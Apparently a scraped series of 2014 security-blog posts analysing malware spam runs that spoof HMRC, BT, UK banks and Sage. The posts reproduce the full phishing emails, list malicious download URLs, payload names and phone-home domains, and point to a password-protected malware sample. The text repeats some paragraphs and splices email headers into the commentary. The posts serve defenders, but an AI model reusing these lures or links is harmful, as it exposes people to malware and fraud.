http://motobrothers.com.pl/documents/document26092014-008.php
http://splash.com.my/documents/document26092014-008.php
http://www.firstlcoc.org/documents/document26092014-008.php
http://elblogderosner.com/documents/document26092014-008.php
HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@taxreg.hmrc.gov.uk [noreply@taxreg.hmrc.gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here: http://motobrothers.com.pl/documents/document26092014-008.php
The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.
Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@bt.com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link below : http://splash.com.my/documents/document26092014-008.php
If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt.com/personal/digitalvault/help or call the helpdesk on 0870 240 0346* between 8am and midnight.
Thank you for choosing BT Digital Vault.
Kind regards,
BT Digital Vault Team
footer
*Calls charged up to 8 pence per minute on the BT network (minimum fee 5.5p). Mobile and other network costs may vary. See http://www.bt.com/pricing for details.
Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address.
This electronic message contains information from British Telecommunications plc, which may be privileged or confidential. The information is intended for use only by the individual(s) or entity named above. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of the contents of this information is strictly prohibited. If you have received this electronic message in error, please delete this email immediately.
Registered office: 81 Newgate Street London EC1A 7AJ Registered in England no: 1800000
RBS Bankline: Outstanding invoice
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload as earlier.
From: Bankline.Administrator@rbs.co.uk [Bankline.Administrator@rbs.co.uk]
To: redacted.uk
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here
I would be grateful if you could look into this matter and advise on an expected payment date .
Many thanks
Paul Hamilton
Credit Control
Tel: 0845 300 2952
The links I have seen so far in the emails are:
http://motobrothers.com.pl/documents/document26092014-008.php
http://splash.com.my/documents/document26092014-008.php
http://www.firstlcoc.org/documents/document26092014-008.php
http://elblogderosner.com/documents/document26092014-008.php
Malware spam: "Employee Documents - Internal Use" / "You have a new voice" / "BACS Transfer : Remittance for JSAG244GBP" / "New Fax"
Whoever is running this spam run is evolving it day after day, with different types of spam to increase clickthrough rates and now some tricky tools to prevent analysis of the malware.
http://plugdeals.com/Documents/payment26092014-15
http://iqmaintenance.com.au/Documents/document26092014-20.pdf
http://www.sjorg.com/Documents/voice26092014-18
http://montfort.dk/Documents/faxmessage26092014-16
The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block.
A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.
The landing page script looks like this [pastebin] which is a bit harder to deal with, but nonetheless an malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55. The Anubis report shows the malware attempting to phone home to padav.com which is probably worth blocking.
The links in the emails I have seen go to the following locations (there are probably many, many more):Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents
DOCUMENT LINK: http://iqmaintenance.com.au/Documents/document26092014-20.pdf
Documents are encrypted in transit and store in a secure repository
---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential. If you received this transmission in error, please notify the sender by reply email and delete the message and any attachments.
You have a new voice
From: Voice Mail [Voice.Mail@victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link below: http://www.sjorg.com/Documents/voice26092014-18
The link to this secure message will expire in 24 hours. If you would like to save a copy of the email or attachment, please save from the opened encrypted email. If an attachment is included, you will be given the option to download a copy of the attachment to your computer.
RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@rbs.co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link below:
http://plugdeals.com/Documents/payment26092014-15
New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here : http://montfort.dk/Documents/faxmessage26092014-16
http://plugdeals.com/Documents/payment26092014-15
http://iqmaintenance.com.au/Documents/document26092014-20.pdf
http://www.sjorg.com/Documents/voice26092014-18
http://montfort.dk/Documents/faxmessage26092014-16
The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block.
A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.
The landing page script looks like this [pastebin] which is a bit harder to deal with, but nonetheless an malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55. The Anubis report shows the malware attempting to phone home to padav.com which is probably worth blocking.
Thursday 25 September 2014
Malware spam: RBS "BACS Transfer" / Sage "Outdated Invoice" / Lloyds "Important - Commercial Documents" / NatWest "Important - New account invoice"
There seems to be a very aggressive spam run this morning, with at least four different email formats pushing the same malicious download.
http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
http://convergika.com/atlbhffykf/rdtlixjoot.html
http://calastargate.net/iqfhtfqinv/ybzhlpbjkh.html
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
There are probably many, many more locations. In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file.
This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54. The Anubis report shows that it phones home to ukrchina-logistics.com which is probably worth blocking or monitoring access to.
RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@rbs.co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link below:
http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@sage.com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
https://invoice.sage.co.uk/Account?928143=Invoice_092514.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.
We have communicated this information with users as well, and we will continue to communicate with you through email as your transition continues.
This email was sent to: [redacted]
This email was sent by: Sage UK Limited
NC1-002-08-25, Newcastle upon Tyne., North Park, NE13 9AA, United Kingdom
Privacy and Security
Keeping your financial information secure is one of our most important responsibilities. For an explanation of how we manage customer information, please read our Privacy Policy. You can also learn how Sage UK Limited keeps your personal information secure and how you can help protect yourself.
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@lloydsbank.com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file)
----------------------
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
-----------------------
Please note that the Terms and Conditions available below are the Bank's most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager. .
Yours faithfully
James Vance
Senior Manager, Lloyds Commercial Banking
Calls may be monitored or recorded in case we need to check we have carried out your instructions correctly and to help improve our quality of service.
Please remember we guarantee the security of messages sent by email.
NatWest Invoice: "Important - New account invoice
From: NatWest Invoice [invoice@natwest.com]The links in the emails go to different download locations to make it harder to block:
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below :
https://www.nwolb.com/ServiceManagement/ InvoicePageNoMenu.aspx? InvoiceCode=Invoice_232449
Thank you for choosing NatWest.
Important: Please do not respond to this message. It comes from an unattended mailbox.
This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.
The Royal Bank of Scotland International Limited trading as NatWest (NatWest). Registered Office: P.O. Box 64, Royal Bank House, 71 Bath Street, St. Helier, Jersey JE4 8PJ. Regulated by the Jersey Financial Services Commission.
http://shetabweb.com/bvqsyphiwq/cdddcetuex.html
http://convergika.com/atlbhffykf/rdtlixjoot.html
http://calastargate.net/iqfhtfqinv/ybzhlpbjkh.html
http://fantastyka.nets.pl/irdmewoars/jyfiqmcojv.html
There are probably many, many more locations. In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file.
This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54. The Anubis report shows that it phones home to ukrchina-logistics.com which is probably worth blocking or monitoring access to.
Wednesday 24 September 2014
More spam from the "Institute of Project Management America" (instituteofprojectmanagementamerica.org)
I've been on the case of the individuals spamming for IPMA (and before that NAPPPA) for some time, but it is disappointing to see that they are still pushing their fake seminars such as this one..
The people who run this have a very poor reputation for both the quality of the courses and not paying monies owed. Often they claim that the course is being run at a prestigious location, but at the last moment the venue changes to somewhere a lot cheaper. The last spam I received advertising a course at Seattle Public Library in August attracted this comment:
The following IPs and domains are all connected to this spam run:
91.236.75.132
104.128.224.126
104.128.225.55
172.245.33.189
grantfundingusa.org
instituteofprojectmanagementamerica.org
ipma2014.org
projectmanagementusa.org
ipma2.org
ipma3.org
ipma5.org
ipma6.org
ipma7.org
ipma8.org
ipma9.org
ipma10.org
ipma11.org
ipma12.org
My personal belief is that this so-called Institute is a complete scam and it should be avoided.
From: Institute of Project Management America [announcements@ipma8.org]
Date: 24 September 2014 06:36
Subject: Project Management Masters Certification Program (October 28-31, 2014: University of Portland)
The Project Management Masters Certification Program will be offered October 28-31, 2014 in Portland, Oregon. Project management professionals, business and technology professionals, students, and educators are invited to register at the Institute of Project Management America website here.
October 28-31, 2014
University of Portland
Portland, OregonThe PMMC is designed for those seeking professional project management certification. It serves as both a thorough professional education and recognized certification. Those seeking additional credentials such as the PMP®/PgMP®, PMI-SP®, and PMI-RMP® will benefit from this dynamic and interactive work session, while those currently holding credentials will find the certification to be an enhancement as well as the most up to date advanced professional development.Project Management Masters Certification program provides 36 hours of project management education, meeting education requirements for both PMI's Certified Associate in Project Management (CAPM) ® and Project Management Professional (PMP) certifications. Additionally, the Master Certification provides 36 Professional Development Units (PDUs) for current holders of PMP®/PgMP®, PMI-SP®, and PMI-RMP® credentials.The program meets the education requirement for all professional designations through the Project Management Institute and other professional agencies. Additionally, the program awards 3.6 Continuing Education Units (CEUs) upon request.Program DescriptionOur certificate program teaches technical and business professionals how to master the critical skills of project management techniques as part of their technical career development.The skills developed in the Project Management Masters Certification program apply to large and small projects, product design and development efforts, construction projects, IT projects, software development, and any project with critical performance, time, and budget targets.Our approach to project management education offers proven, results-focused learning.Courses are developed and facilitated by professional subject experts with extensive industrial experience. Course emphasis is on providing practical skills and tools supported by relevant case examples.TuitionTuition for the four-day Project Management Masters Certification program is $995.00Program Schedule and Content1. Project Initiation, Costing, and Selection, Day 12. Project Organization and Leadership, Day 23. Detailed Project Planning, Day 2 and 34. Project Monitoring and Control, Day 3 and 45. Project Risk Management, Day 4Benefits· A PMMC certificate of accomplishment is awarded upon completion of the four day program of five courses. Completion letters are given for each course.· Our instructors have extensive industrial experience. They focus on providing you with practical skills and tools using relevant case examples.· Each class is highly focused and promotes maximum interaction.· You can network with other project management professionals from a variety of industries.· Earn Professional Development Units (PDUs) for maintenance of certification under the PMI Continuing Certification Requirements Program.· Applicants for PMI's Certified Associate in Project Management (CAPM)® and Project Management Professional (PMP) certifications will have met all education requirements for eligibility.RegistrationParticipants may reserve a seat online at the Institute of Project Management America website, by calling the Program Office toll-free at (888) 859-5659, or by sending their name and contact information via email the Program Registrar .Upon receiving your registration, a confirmation email is sent to registrants that include session site information, travel information, program description, and details on how to confirm attendance and make payment arrangements.Click HERE to unsubscribe from this mailing list.
The people who run this have a very poor reputation for both the quality of the courses and not paying monies owed. Often they claim that the course is being run at a prestigious location, but at the last moment the venue changes to somewhere a lot cheaper. The last spam I received advertising a course at Seattle Public Library in August attracted this comment:
As the person who helps run the calendar at Seattle Public Library, I can assure you that they do not have space secured here for their "training". They never returned the contract or payment.In this case the spam originates from 173.55.195.165 (a Verizon customer in Hacienda Heights, California) using a "from" address of announcements@ipma8.org and spamvertising the domain instituteofprojectmanagementamerica.org
The following IPs and domains are all connected to this spam run:
91.236.75.132
104.128.224.126
104.128.225.55
172.245.33.189
grantfundingusa.org
instituteofprojectmanagementamerica.org
ipma2014.org
projectmanagementusa.org
ipma2.org
ipma3.org
ipma5.org
ipma6.org
ipma7.org
ipma8.org
ipma9.org
ipma10.org
ipma11.org
ipma12.org
My personal belief is that this so-called Institute is a complete scam and it should be avoided.
"You have received a new secure message from BankLine" spam leads to undetected malware
From: Bankline [secure.message@bankline.com]The link in the email goes to ismashahalam.net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam.net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50.
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
http://ismashahalam.net/xyzpayohjx/ngkzoeqjjs.html
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 7941.
First time users - will need to register after opening the attachment.
About Email Encryption - https://supportcentre.Bankline.com/app/answers/detail/a_id/1671/kw/secure%20message
The Anubis report shows that the malware phones home to very-english.co.uk which is worth blocking or monitoring.
For research purposes only, a copy of the malicious executable can be downloaded from here [zip]. The password is foray307.
Tuesday 23 September 2014
Malicious "Employee Documents - Internal Use" spam spoofs victim's domain
This spam appears to come from the victim's own domain, but in fact doesn't and it leads to malware instead.
From: victimdomain.com [INTERNAL@victimdomain.com]In this case the link goes to cystersi.wagrowiec.pl/bitusagezp/paqzdzsfjs.html and then downloads a file from cystersi.wagrowiec.pl/bitusagezp/EmployeeDocuments.zip which unzips to a malicious executable EmployeeDocuments.scr. This is exactly the same payload as found in this spam run earlier today.
To: victim@victimdomain.com
Date: 23 September 2014 11:43
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents
DOCUMENT LINK: http://cystersi.wagrowiec.pl/bitusagezp/paqzdzsfjs.html
Documents are encrypted in transit and store in a secure repository
---------------------------------------------------------------------------------
This message may contain information that is privileged and confidential. If you received this transmission in error, please notify the sender by reply email and delete the message and any attachments.
According to this spam.. "You have a new voice". Really?
From: Voice MailHang on.. cough cough.. la la la la la la.. testing testing. Nope, my voice sounds pretty much the same as it usually does.
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link below: http://www.ezysoft.in/ocjnvzulsx/begmnbjiae.html
The link to this secure message will expire in 24 hours. If you would like to save a copy of the email or attachment, please save from the opened encrypted email. If an attachment is included, you will be given the option to download a copy of the attachment to your computer.
The link in the email downloads a file from www.ezysoft.in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54.
According to this Anubis report the malware attempts to phone home to very-english.co.uk which might be worth blocking.
Labels:
Malware,
Spam,
Viruses,
Voice Mail
Subscribe to:
Posts (Atom)